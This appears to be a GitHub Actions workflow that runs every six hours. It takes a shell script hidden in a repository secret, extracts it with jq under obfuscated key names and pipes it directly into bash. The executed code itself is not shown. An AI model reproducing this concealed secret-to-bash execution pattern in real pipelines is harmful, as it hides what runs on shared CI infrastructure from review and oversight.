name: zengwutuan1234
on:
  workflow_dispatch:
  schedule:
    - cron: '11 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zengwutuan1234
        env:
          ka1: ${{ secrets.ka1 }}
        run: |
          echo $ka1 | jq -r .mgd15919 | /bin/bash
          echo $jemvc9 | jq -r .le2649 | /bin/bash
          echo $iiv48347 | jq -r .vavo4483 | /bin/bash
          echo $nce34627 | jq -r .auuo171 | /bin/bash
          echo $dvefx6757 | jq -r .rn680 | /bin/bash
          echo $yj4 | jq -r .rkfwk25282 | /bin/bash
          echo $rq4 | jq -r .baoiy5098 | /bin/bash

